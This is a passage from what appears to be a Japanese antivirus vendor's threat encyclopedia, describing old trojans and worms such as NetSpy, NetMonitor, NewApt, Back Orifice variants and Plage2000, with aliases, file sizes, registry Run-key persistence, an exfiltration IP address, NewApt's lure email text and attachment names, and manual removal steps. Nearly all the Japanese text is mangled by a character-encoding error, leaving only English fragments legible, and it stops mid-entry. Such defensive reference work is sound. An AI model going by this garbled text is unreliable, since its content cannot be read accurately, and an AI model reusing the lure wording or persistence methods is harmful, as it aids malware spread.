¡¡¥Þ¥·¥ó¤Î¥µ¥¦¥ó¥Éµ¡Ç½¤Î¤¦¤Á¡¢¥Ü¥ê¥å¡¼¥à¤ä¥Ð¥é¥ó¥¹¤Ê ¤É¤ÎÀßÄê¤ò¥é¥ó¥À¥à¤ËÊѹ¹¤·¤Þ¤¹¡£ ¡¦¥Ç¥¤¥ì¥¯¥È¥ê¥Ä¥ê¡¼¹½À®¤Îµ­Ï¿
¡¡µ¯Æ°¥É¥é¥¤¥Ö¤È¤½¤Î¼¡¤Î¥É¥é¥¤¥Ö¡Ê°ìÈÌŪ¤Ë¤ÏC:¡¢D:¡Ë
¤Î¾ðÊó¤ò´Þ¤àµ¶¤Î¥Ç¥£¥ì¥¯¥È¥ê¾ðÊó¥Õ¥¡¥¤¥ë¤òºîÀ®¤·¤Þ ¤¹¡£¤³¤Î¥Õ¥¡¥¤¥ë¤Ï¥Æ¥­¥¹¥È·Á¼°¤Ç" ¥Õ¥¡¥¤¥ë̾"¡Ü"¥¹¥Ú ¡¼¥¹"¡Ü"("¡Ü"¥Õ¥¡¥¤¥ë¥µ¥¤¥º"¡Ü")"¤È¤¤¤¦¥Õ¥©¡¼¥Þ¥Ã¥È¤Ë ¤Ê¤Ã¤Æ¤¤¤Þ¤¹¡£ ¡¡¡ÖTROJ_NETBUS1.31¡×¤Ë¤Ï¥¢¥ó¥¤¥ó¥¹¥È¡¼¥ëµ¡Ç½¤¬¤¢¤ê¤Þ ¤¹¡£¥¤¥ó¥¹¥È¡¼¥ë¤·¤Æ¤·¤Þ¤Ã¤¿¾ì¹ç¤Ë¤Ï¥¢¥ó¥¤¥ó¥¹¥È¡¼¥ë ¤¹¤ë¤«¡¢¥Õ¥¡¥¤¥ëºï½ü¤ò¹Ô¤Ã¤Æ¤¯¤À¤µ¤¤¡£

TROJ_NETMONITOR


̾¡¡¡¡¾Î:TROJ_NETMONITOR

ÊÌ¡¡¡¡Ì¾:TROJ_NETMONITOR.DROPPER ޤNETMONITOR ޤ
NETSPY
ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:188ޤ926/88ޤ576¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:-¡¡¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿°­¼Á¥×¥í¥°¥é¥à¤Ç¤¢¤ë
Ž¡´¶À÷¤Ï¤·¤Ê¤¤Ž¡ -¡¡¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢¥·¥¹¥Æ¥à¡¦¥ì¥¸¥¹¥È¥ê¤Î Software\Microsoft\Windows\CurrentVersion\Run¥­¡¼¤òÊÑ ¹¹¤·¡¢¥¦¥¤¥ë¥¹ ¥³¡¼¥É¤òNETSPY.INI¤ËÅÐÏ¿¤¹¤ë¡£¤½¤Î·ë²Ì¡¢¥æ¡¼¥¶¡¼¤¬¥Þ ¥·¥ó¤Ë¥í¥°¥ª¥ó¤¹¤ë¤¿¤Ó¤Ë¡¢¥¦¥¤¥ë¥¹¤¬¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤Ë ¤Ê¤ë¡£
»³²:
¡¡¥¯¥é¥¤¥¢¥ó¥È/¥µ¡¼¥Ð¡¼´Ä¶­Æâ¤òõ¤ê¡¢¥¤¥ó¥¿¡¼¥Í¥Ã¥È¤Ø ¤ÎÈ´¤±Æ»¤ò¸«¤Ä¤±½Ð¤·¤Æ¡¢202.103.106.189¤È¤¤¤¦IP¥¢¥É¥ì ¥¹¤Ë¾ðÊó¤òÁ÷ÉÕ¤·¤è¤¦¤È¤¹¤ë¡£
È÷¡¡¡¡¹Í:¡¡¤³¤Î¥¦¥¤¥ë¥¹¤¬ÍѤ¤¤ë¥Æ¥¯¥Ë¥Ã¥¯¤Ï¡¢
BackOrificeÅù¤ÇÍѤ¤¤é¤ì¤Æ¤¤¤ë¤â¤Î¤ÈƱÍͤǤ¢¤ë¡£

TROJ_NETSPY


̾¡¡¡¡¾Î:TROJ_NETSPY

ÊÌ¡¡¡¡Ì¾:NETSPY

¸À¡¡¡¡¸ì:Ãæ¹ñ¸ì

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Windows3.1°Ê¾å

¥¦¥¤¥ë¥¹¥µ¥¤¥º:169,984¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:¥Ï¥Ã¥­¥ó¥°Ž¥¥æ¡¼¥Æ¥£¥ê¥Æ¥£NETSPY¤Î¥¯¥é¥¤¥¢¥ó
¥È¡¦¥â¥¸¥å¡¼¥ë¡£¥Ï¥Ã¥«¡¼¤¬¥ê¥â¡¼¥ÈPC¤òÀ©¸æ¤¹¤ë¤¿¤á¤Î ¥¤¥ó¥¿¥Õ¥§¡¼¥¹¤Ç¤¢¤ê¡¢Windows¤Î¥¨¥¯¥¹¥×¥í¡¼¥é¤È¤è¤¯»÷ ¤Æ¤¤¤ë¡£¥Ï¥Ã¥«¡¼¤Ï¥ê¥â¡¼¥ÈPC¤Î¥â¥Ë¥¿¡¼²èÌ̤òľÀܸ«¤Æ ¤¤¤ë¤è¤¦¤ËÁàºî¤Ç¤­¡¢¥á¥Ã¥»¡¼¥¸¤ÎÁ÷ÉÕ¡¢¥ê¥â¡¼¥ÈPC¤Î¥· ¥ã¥Ã¥È¥À¥¦¥ó¡¢¥¢¥×¥ê¥±¡¼¥·¥ç¥ó¤Îµ¯Æ°¡¢Wordʸ½ñ¤ò³«¤¯ ¤³¤È¤Ê¤É¤¬¤Ç¤­¤ë¡£

TROJ_NETSPY.1


̾¡¡¡¡¾Î:TROJ_NETSPY.1

ÊÌ¡¡¡¡Ì¾:NETSPY

¸À¡¡¡¡¸ì:Ãæ¹ñ¸ì

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:63,488¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:¥Ï¥Ã¥­¥ó¥°Ž¥¥æ¡¼¥Æ¥£¥ê¥Æ¥£NETSPY¤Î¥µ¡¼¥Ð¡¼¡¦
¥â¥¸¥å¡¼¥ë¡£¥È¥í¥¤¤ÎÌÚÇÏ·¿¤Ç¤¢¤ê¡¢¥æ¡¼¥¶¡¼¤¬¤¢¤ä¤Þ¤Ã ¤Æ¥¦¥¤¥ë¥¹¤ò¼Â¹Ô¤¹¤ë¤È¡¢¤³¤Î¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤¬PC¤Ë ¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¡¢¥¯¥é¥¤¥¢¥ó¥È¡Ê¥Ï¥Ã¥«¡¼¡Ë¤¬PC¤Ë¥¢¥¯ ¥»¥¹¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤ë¡£ Windows¤¬µ¯Æ°¤¹¤ë¤¿¤Ó¤Ë¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤Ï¸Æ¤Ó½Ð¤µ ¤ì¡¢¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤¿PC¤«¤é ¥¢¥¯¥»¥¹¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤ë¡£

TROJ_NEWAPT


̾¡¡¡¡¾Î:TROJ_NEWAPT

ÊÌ¡¡¡¡Ì¾:W32.NEWAPT.WORM, WORM.NEWAPT

¸À¡¡¡¡¸ì:±Ñ¸ì

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿,¥ï¡¼¥à

¾Ü¡¡¡¡ºÙ:TROJ_NEWAPT.WORM¤ÏE-mail¤òÍøÍѤ·¤Æ³È»¶¤¹¤ë
¥á¥â¥ê¾ïÃ󷿥¥à¤Ç¤¹¡£2000ǯ¤ò½Ë¤¦¥¢¥Ë¥á¡¼¥·¥ç¥ó¤Ç ¤¢¤ë¤È¤¤¤¦±Ñʸ¥á¡¼¥ë¤È¤È¤â¤ËÁ÷¤é¤ì¤Æ¤­¤Þ¤¹¤¬¡¢¼Â¹Ô¤¹ ¤ë¤È¡¢¥ï¡¼¥à¥×¥í¥°¥é¥à¤ò¼«Æ°Åª¤ËÁ÷¿®¤·¤Æ¤·¤Þ¤¤¤Þ¤¹¡£ Á÷¿®¤¹¤ëÅ٤˥é¥ó¥À¥à¤ËźÉÕ¥Õ¥¡¥¤¥ë̾¤òÊѹ¹¤¹¤ë¤Ê¤É¡¢ Èó¾ï¤ËÊ£»¨¤Ê¥×¥í¥°¥é¥à¤È¤Ê¤Ã¤Æ¤¤¤Þ¤¹¡£
´¶À÷:
¡¡¤³¤Î¥ï¡¼¥à¤Ï¥á¡¼¥ë¤ËźÉÕ¤µ¤ì¤Æ³È»¶¤·¤Þ¤¹¡£¥á¡¼¥ë¼õ ¿®¼Ô¤Î¥á¡¼¥ë¥¯¥é¥¤¥¢¥ó¥È¤¬HTML·Á¼°¤Î¥á¡¼¥ë¤¬°·¤¨¤Ê¤¤
¾ì¹ç¡¢ËÜʸ¤Ï°Ê²¼¤Î¤è¤¦¤Ë¤Ê¤ê¤Þ¤¹:
¡¡he, your lame client cant read HTML, haha. ¡¡click attachment to see some stunningly HOT stuff ¥á¡¼¥ë¥¯¥é¥¤¥¢¥ó¥È¤¬HTML·Á¼°¤ËÂбþ¤·¤Æ¤¤¤ë¾ì¹ç¡¢ËÜʸ
¤Ï°Ê²¼¤Ë¤Ê¤ê¤Þ¤¹:

http://
stuart.messagemates.com/index.html ¡¡Hypercool Happy Year 2000 funny programs and animations¡¦ We attached our recent animation from this site in our mail ! Check it out! ¤³¤³¤Ë¤ÏMessage Mates¤È¤¤¤¦¥µ¥¤¥È¤ÎURL¤¬µ­½Ò¤µ¤ì¤Æ¤¤ ¤Þ¤¹¤¬¡¢¥¦¥¤¥ë¥¹¤È¤ÏÁ´¤¯´Ø·¸¤¢¤ê¤Þ¤»¤ó¡£¡¡ ¸½ºß¤Î¤È¤³¤í¡¢¤³¤Î¥ï¡¼¥à¤¬¥á¡¼¥ë¤ËźÉÕ¤¹¤ë¥Õ¥¡¥¤¥ë¤Î
¥Õ¥¡¥¤¥ë̾¤Ï°Ê²¼¤Î¤â¤Î¤¬¤¢¤ë¤³¤È¤¬È½ÌÀ¤·¤Æ¤¤¤Þ¤¹:
baby.exe, bboy.exe, boss.exe, casper.exe, chestburst.exe, cooler1.exe, cooler3.exe,copier. exe, cupid2.exe, farter.exe,fborfw.exe, gadget.exe goal.exe, goal1.exe, g-zilla.exe, hog.exe,irnglant. exe, monica.exe, panther.exe, party.exe, pirate. exe,saddam.exe, theobbq.exe, video.exe ¥á¡¼¥ë¼õ¿®¼Ô¤¬ÅºÉÕ¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢DLL¤¬¸«¤Ä¤« ¤é¤Ê¤¤»Ý¤Îµ¶¤Î¥¨¥é¡¼¥À¥¤¥¢¥í¥°¤¬É½¼¨¤µ¤ì½ªÎ»¤·¤¿¤« ¤Î¤è¤¦¤Ë¸«¤¨¤Þ¤¹¡£ The dinamic link library giface.dll
could not be found in the specified path C:\

windows: C:\windows\system...

¤·¤«¤·¡¢¤³¤Î´Ö¤Ë¥ï¡¼¥à¤Ï¥á¥â¥ê¤Ë¾ïÃó¤·¡¢¤Þ¤¿¡¢C:\
Windows ¥Ç¥£¥ì¥¯¥È¥ê¤Ë¼«Ê¬¼«¿È¤òÊ£À½¤·¤Þ¤¹¡£
¾É¾õ:
Windows¤Î¥ì¥¸¥¹¥È¥ê¤Ë°Ê²¼¤Î¥­¡¼¤òÅÐÏ¿¤·¤Þ¤¹¡£ ¡¡HKEY_LOCAL_MACHINES\Software\Microsoft\Windows\ CurrentVersion\Run\tpanew ¤³¤ì¤Ë¤è¤ê¡¢¥Þ¥·¥óµ¯Æ°»þ¤Ë¥ï¡¼¥à¤¬¼«Æ°Åª¤Ëµ¯Æ°¤µ¤ì¤ë ¤è¤¦¤Ë¤Ê¤ê¤Þ¤¹¡£
È÷¡¡¡¡¹Í:****¼êưºï½ü¼ê½ç
¥ì¥¸¥¹¥È¥ê¥¨¥Ç¥£¥¿¤òÍøÍѤ·¤Æ¡¢¥ï¡¼¥à¤¬ºîÀ®¤·¤¿¥ì¥¸¥¹ ¥È¥ê¥¨¥ó¥È¥ê¤ÎÃͤò ºï½ü¤·¤Þ¤¹¡£ ¡¡HKEY_LOCAL_MACHINES\Software\Microsoft\Windows\ CurrentVersion\Run\tpanew ¤³¤ì¤Ë¤è¤ê¥ï¡¼¥à¤Ï¼«Æ°µ¯Æ°¤¬¤Ç¤­¤Ê¤¯¤Ê¤ê¤Þ¤¹¤Î¤Ç ¥Þ¥·¥ó¤òºÆµ¯Æ°¤·¤Þ¤¹¡£ ¥¦¥¤¥ë¥¹¥Ð¥¹¥¿¡¼¤¬È¯¸«¤·¤¿¥Õ¥¡¥¤¥ë¤ò¤¹¤Ù¤Æºï½ü¤· ¤Þ¤¹¡£

TROJ_NMSG


̾¡¡¡¡¾Î:TROJ_NMSG

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:.EXE(DOSÍÑ16bit¼Â¹Ô¥Õ¥¡¥¤¥ë)

¥¦¥¤¥ë¥¹¥µ¥¤¥º:N/A

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:-¡¡¤³¤ì¤Ï¥È¥í¥¤¤ÎÌÚÇÏ·¿¤ËʬÎव¤ì¤ë°­¼Á¥×¥í
¥°¥é¥à¤Ç¤¢¤ëŽ¡ -¡¡¤³¤Î¥Õ¥¡¥¤¥ë¤òDOS¥³¥Þ¥ó¥É¤«¤é¼Â¹Ô¤·Ž¤ÆÃÄê¤Î¥Õ¥¡¥¤¥ë ¤ò»ØÄꤹ¤ë¤Èޤ¤½¤Î¥Õ¥¡¥¤¥ë¤Î¥µ¥¤¥º¤ò100ޤ000bytesÁý²Ã¤µ ¤»¤ëŽ¡ -¡¡¤³¤Î¥×¥í¥°¥é¥à¤Ï16bit EXE¥Õ¥¡¥¤¥ë¤ËÂФ·¤Æ¤Î¤ßޤ¤³¤Î ³èư¤ò¹Ô¤¦Ž¡
È÷¡¡¡¡¹Í:

TROJ_NOGZOEEN


̾¡¡¡¡¾Î:TROJ_NOGZOEEN

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:3,036¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë¥¹¡£¼Â¹Ô¤µ¤ì¤¿¥¦¥¤¥ë¥¹
¤Ï¡¢¥ë¡¼¥È¥Ç¥£¥ì¥¯¥È¥êÆâ¤Ë¿¿ô¤Î¥Ç¥£¥ì¥¯¥È¥ê¤òºîÀ®¤¹ ¤ë( 1.1, 2.2, 3.3, ¡Á ??? )¡£¤³¤ì¤é¤Î¥Ç¥£¥ì¥¯¥È¥ê¤Ë¤Ï ¾¤Î¥µ¥Ö¥Ç¥£¥ì¥¯¥È¥ê¤ä¥Õ¥¡¥¤¥ë¤ÏºîÀ®¤µ¤ì¤Ê¤¤¡£¤¿¤À ¤·¡¢ºÇ¸å¤Î¥Ç¥£¥ì¥¯¥È¥ê¤Ë¤Ï¡¢¤³¤Î¥Ç¥£¥ì¥¯¥È¥ê¤ÈƱ¤¸Ì¾ Á°¤ò¤â¤Ä10ÁؤΥµ¥Ö¥Ç¥£¥ì¥¯¥È¥ê¤¬¤¢¤ê¡¢¤½¤ì¤¾¤ì¤Î¥µ¥Ö ¥Ç¥£¥ì¥¯¥È¥ê¤Ë£²¤Ä¤Î±£¤·¥Õ¥¡¥¤¥ëIO.SYS¤ÈMSDOS.SYS¤¬´Þ ¤Þ¤ì¤ë¡£ ¥¦¥¤¥ë¥¹¤Ï¡¢¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î¤Û¤«¡¢¥Õ¥í¥Ã¥Ô¡¼¥Ç¥£¥¹¥¯ ¤Ë¤â½ñ¤­¹þ¤ß¤¹¤ë¡£ ¥á¥â¥ê¡¼¤Ë¤Ï¾ïÃ󤻤º¡¢¤È¤¯¤ËÇ˲õ³èư¤Ï¹Ô¤Ê¤ï¤Ê¤¤¡£

TROJ_NTMONITOR


̾¡¡¡¡¾Î:TROJ_NTMONITOR

ÊÌ¡¡¡¡Ì¾:NETMONITOR / NETSPY, TROJ_NTMONITOR.DROPPER

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:188,926bytes

ȯ¾ÍÃÏ:Ãæ¹ñ

¾Ü¡¡¡¡ºÙ:-¡¡¤³¤ì¤Ï¥Í¥Ã¥È¥ï¡¼¥¯¤ò²ð¤·¤Æ¥Þ¥·¥ó¤ò¥ê¥â
¡¼¥È¥³¥ó¥È¥í¡¼¥ë¤¹¤ë¤¿¤á¤Î¥µ¡¼¥Ð¡¼Ž¥¥¯¥é¥¤¥¢¥ó¥È·¿¥×¥í ¥°¥é¥à¤Ç¤¢¤ëŽ¡ÉÔÀµ¿¯Æþ¤ò¿Þ¤ë¥Ï¥Ã¥«¡¼¤Ïޤ¥æ¡¼¥¶¡¼¤Ë¤½¤ì ¤ÈÃΤ餺¤Ë¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à(TROJ_NTMONITOR)¤ò¥¤¥ó¥¹ ¥È¡¼¥ë¤µ¤»¤ëŽ¡¥¤¥ó¥¹¥È¡¼¥ë¤·¤Æ¤·¤Þ¤Ã¤¿¥Þ¥·¥ó¤Ïޤ¥¯¥é¥¤ ¥¢¥ó¥È¥×¥í¥°¥é¥à¤«¤é¾¡¼ê¤Ë¥³¥ó¥È¥í¡¼¥ë¤¹¤ë¤³¤È¤¬¤Ç¤­ ¤ë¤è¤¦¤Ë¤Ê¤ëŽ¡ ¡Ý¡¡¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢Windows OS¤Î¥¤¥ó¥¹¥È¡¼¥ë
¥Ç¥£¥ì¥¯¥È¥ê(Îã:C:\Windows)¤ÎÃæ¤Ë¥Õ¥¡¥¤¥ë¼«¿È¤ò¥³¥Ô
¡¼¤¹¤ëŽ¡¤Þ¤¿Ž¤¥ì¥¸¥¹¥È¥ê¤Î\\HKEY_LOCAL_MACHINE\Software \Microsoft\Windows\CurrentVersion\run ¤ËÅÐÏ¿¤·Ž¤¥¦¥¤¥ë¥¹¥³¡¼¥É¤òNETSPY.INI¤ËÅÐÏ¿¤¹¤ë¡£¤½¤Î·ë ²Ì¡¢¥æ¡¼¥¶¡¼¤¬¥Þ¥·¥ó¤Ë¥í¥°¥ª¥ó¤¹¤ë¤¿¤Ó¤Ë¡¢¥¦¥¤¥ë¥¹¤¬ ¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤Ë¤Ê¤ë.¥×¥í¥°¥é¥à¼Â¹ÔÃæ¤Ï¥Õ¥¡¥¤¥ë¤Îºï½ü ¤¬¤Ç¤­¤Ê¤¤Ž¡
»³²:-¥¯¥é¥¤¥¢¥ó¥È/¥µ¡¼¥Ð¡¼´Ä¶­Æâ¤òõ¤ê¡¢¥¤¥ó¥¿¡¼¥Í
¥Ã¥È¤Ø¤ÎÈ´¤±Æ»¤ò¸«¤Ä¤±½Ð¤·¤Æ¡¢202.103.106.189¤È¤¤¤¦IP ¥¢¥É¥ì¥¹¤Ë¾ðÊó¤òÁ÷ÉÕ¤·¤è¤¦¤È¤¹¤ë¡£ - ¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤ò¥¤¥ó¥¹¥È¡¼¥ë¤·¤¿°­°Õ¤ò»ý¤Ä Âè»°¼Ô¤Ïޤ¤³¤Î¾õÂ֤Υޥ·¥ó¤Ë¥ê¥â¡¼¥È¥¢¥¯¥»¥¹¤·¤Æ¼«Í³¤Ë Áà¤ë¤³¤È¤¬¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤ëŽ¡
È÷¡¡¡¡¹Í:**¼êưºï½ü¼ê½ç**¡Ê¥¦¥¤¥ë¥¹¤Ç¤Ï¤Ê¤¤¤Î¤Ç¶î½ü
¤¹¤ë¤³¤È¤Ï¤Ç¤­¤Ê¤¤¡Ë ­¡Windows¥á¥Ë¥å¡¼¤«¤éŽ¢¥Õ¥¡¥¤¥ë̾¤ò»ØÄꤷ¤Æ¼Â¹ÔŽ£¤òÁª¤Ó ޤregedit¤ÈÆþÎϤ·¤ÆŽ¤¥ì¥¸¥¹¥È¥ê¥¨¥Ç¥£¥¿¤òɽ¼¨¤¹¤ëŽ¡ ­¢°Ê²¼¤Î¥ì¥¸¥¹¥È¥ê¥¨¥ó¥È¥ê¤Ë¡¢¥¦¥¤¥ë¥¹ËÜÂΤÎEXE¤¬ÅÐÏ¿ ¤µ¤ì¤ë(¥È¥ì¥ó¥ÉÀ½ÉʤǸ¡½Ð¤µ¤ì¤¿¥Õ¥¡¥¤¥ë̾)¡£¤³¤ÎÃͤò ºï½ü¤¹¤ë¡£ \\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\run ­¤¥Þ¥·¥ó¤òºÆµ¯Æ°¤·Ž¤\Windows\¥Ç¥£¥ì¥¯¥È¥ê¤Ë¤¢¤ë¥¦¥¤¥ë ¥¹ËÜÂΤÎEXE¡Ê¥È¥ì¥ó¥ÉÀ½ÉʤǸ¡½Ð¤µ¤ì¤¿¥Õ¥¡¥¤¥ë¡Ë¤òºï½ü ¤¹¤ëŽ¡ ***¥ì¥¸¥¹¥È¥ê¤òÊѹ¹¤¹¤ë¤Î¤ÏÈó¾ï¤Ë¥Ç¥ê¥±¡¼¥È¤Ê¹Ô°Ù¤Ç¤¢ ¤êޤ¸í¤Ã¤¿Áàºî¤ò¹Ô¤¦¤Èޤ¥·¥¹¥Æ¥à¤Ë»½ý¤òÍ¿¤¨¤ë²ÄǽÀ­¤¬ ¤¢¤ê¤Þ¤¹Ž¡¥ì¥¸¥¹¥È¥ê¤Î½¤Éü¤Ï¿µ½Å¤Ë¹Ô¤Ã¤Æ¤¯¤À¤µ¤¤Ž¡

TROJ_ORIFICE.CON


̾¡¡¡¡¾Î:TROJ_ORIFICE.CON

ÊÌ¡¡¡¡Ì¾:BACKORIFICE

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

¾Ü¡¡¡¡ºÙ:¡¡
¡¡¥È¥í¥¤¤ÎÌÚÇÏ·¿¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¡ÖTROJ_BOSERVER¡×¤ÎÀß Äê¥Õ¥¡¥¤¥ë¤ò¼¨¤¹È¯¸«Ì¾¤Ç¤¹¡£¤³¤Î¥Õ¥¡¥¤¥ë¼«ÂÎ¤Ï´í¸±¤Ç ¤Ï¤¢¤ê¤Þ¤»¤ó¤¬¡¢¤³¤Î̾Á°¤Ç¤Îȯ¸«¤Ï¤½¤Î¥Þ¥·¥ó¾å¤Ç¡Ö TROJ_BOSERVER¡×¤¬Æ°ºî¤·¡¢¥Ï¥Ã¥­¥ó¥°¤µ¤ì¤¿¤³¤È¤ò¼¨¤·¤Þ ¤¹¡£¾Ü¤·¤¯¤Ï¡ÖTROJ_BOSERVER¡×¤Î¾ðÊó¤ò¤´Í÷¤¯¤À¤µ¤¤¡£ ¡¡¡ÖTROJ_BOSERVER¡×¤ÎÀßÄê¥Õ¥¡¥¤¥ë¤Ï"BOCONFIG.EXE"¤È¤¤ ¤¦¥Õ¥¡¥¤¥ë̾¤Ç¤¢¤ë¤³¤È¤¬Â¿¤¤¤è¤¦¤Ç¤¹¡£Ã±¤Ê¤ëÀßÄê¥Õ¥¡ ¥¤¥ë¤Ê¤Î¤Ç¶î½ü¤Ï¤Ç¤­¤Þ¤»¤ó¡£¥Õ¥¡¥¤¥ë¤´¤Èºï½ü¤·¤Æ¤¯¤À ¤µ¤¤¡£

TROJ_ORIFICE.DR


̾¡¡¡¡¾Î:TROJ_ORIFICE.DR

ÊÌ¡¡¡¡Ì¾:TROJ_BOSNIFF

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿¡Ê¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¡Ë

ÂС¡¡¡¾Ý:Win9x/NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:588,825 bytes

¾Ü¡¡¡¡ºÙ:-¡¡
¡¡¤³¤ì¤Ï¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¤Ç¤¹¡£¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤È¥¯ ¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤Ëʬ¤«¤ì¤Æ¤ª¤ê¡¢¥µ¡¼¥Ð¡¼¥×¥í¥°¥é ¥à¤ò¥È¥í¥¤¤ÎÌÚÇϤȤ·¤Æ¥Þ¥·¥ó¤Î¥·¥¹¥Æ¥à¤ËÀøÆþ¤µ¤»¡¢¥¯ ¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤ò»ÈÍѤ·¤Æ¥ê¥â¡¼¥ÈÁàºî¤ò¹Ô¤¤¤Þ ¤¹¡£Â¾¤Î¥Õ¥¡¥¤¥ë¤Ø¤Î´¶À÷³èư¤Ï¹Ô¤¤¤Þ¤»¤ó¡£ ¡¡¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤Ïɽ¸þ¤­¤Ï¥Ñ¥¹¥ï¡¼¥ÉÉÕ°µ½Ì¥Õ¥¡¥¤ ¥ë¤Î¥Ñ¥¹¥ï¡¼¥É¤ò²òÀϤ¹¤ë¥×¥í¥°¥é¥à¤Ç¤¹¡£¤·¤«¤·¼Â¹Ô¤¹ ¤ë¤È΢¤Ç¥·¥¹¥Æ¥à¤ò²þÊѤ·¡¢¥Ï¥Ã¥«¡¼¤¬¤½¤Î¥Þ¥·¥ó¤Ë¥¢¥¯ ¥»¥¹¤Ç¤­¤ë¤è¤¦¤Ë¤·¤Æ¤·¤Þ¤¤¤Þ¤¹¡£ ¡¡¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤¬µ¯Æ°¤µ¤ì¤ë¤ÈWindows¤ÎSYSTEM¥Ç¥£
¥ì¥¯¥È¥ê(Ä̾ï¤ÏC:\windows\system¡Ë¤ËEXE¥Õ¥¡¥¤¥ë¤òºîÀ®
¤·¤Þ¤¹¡£¤³¤ÎEXE¤Î¥Õ¥¡¥¤¥ë̾¤Ï¡Ö~¡×¤Ç»Ï¤Þ¤ë£¸Ê¸»ú¤Î¥é
¥ó¥À¥à¤Êʸ»úÎó¤Ç¤¹(Îã:~ityrvyp.exe¡Ë¡£¼¡¤Ë¤³¤Î¥Õ¥¡¥¤
¥ë¤ò \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run ¥ì¥¸¥¹¥È¥ê¤ËÅÐÏ¿¤·¥·¥¹¥Æ¥àµ¯Æ°»þ¤Ë ¼«Æ°µ¯Æ°¤¹¤ë¤è¤¦ÀßÄê¤ò¹Ô¤¤¤Þ¤¹¡£¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤ò µ¯Æ°¤¹¤ë¤¿¤Ó¤Ë¿·¤·¤¤¥Õ¥¡¥¤¥ë¤òºîÀ®¤·¡¢¥ì¥¸¥¹¥È¥ê¤ËÅÐ Ï¿¤·¤Þ¤¹¡£
È÷¡¡¡¡¹Í:¼êư½¤Éü¼ê½ç:
¡¡¥ì¥¸¥¹¥È¥ê¥¨¥Ç¥£¥¿¤òµ¯Æ°¤· \HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run ¤Ë TROJ _ORIFICE.DR¤¬ºî¤Ã¤¿¥¨¥ó¥È¥ê¡¼¤ò¤¹¤Ù¤Æºï½ü¤·¤Æ¤¯¤À¤µ ¤¤¡£¥Õ¥¡¥¤¥ë̾¤Ï¥é¥ó¥À¥à¤Ç¤¹¤¬¤¹¤Ù¤Æ¡Ö~¡×¤Ç»Ï¤Þ¤ê¤Þ ¤¹¡£¤½¤Î¸å¥Þ¥·¥ó¤òºÆµ¯Æ°¤·¡¢È¯¸«¤·¤¿¥Õ¥¡¥¤¥ë¤ò¤¹¤Ù¤Æ ºï½ü¤·¤Æ¤¯¤À¤µ¤¤¡£ ¡¡

TROJ_PLAGE2000.A


̾¡¡¡¡¾Î:TROJ_PLAGE2000.A

ÊÌ¡¡¡¡Ì¾:PLAGE2000, W95/Plage.worm

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿¡Ê¥ï¡¼¥à)

ÂС¡¡¡¾Ý:Win9x/NT

¥¦¥¤¥ë¥¹¥µ¥¤¥º:102,400 bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤ÏÆÃ¤Ë¡Ö¥ï¡¼¥à¡×¤ËʬÎव¤ì¤ë¥È¥í¥¤¤ÎÌÚ
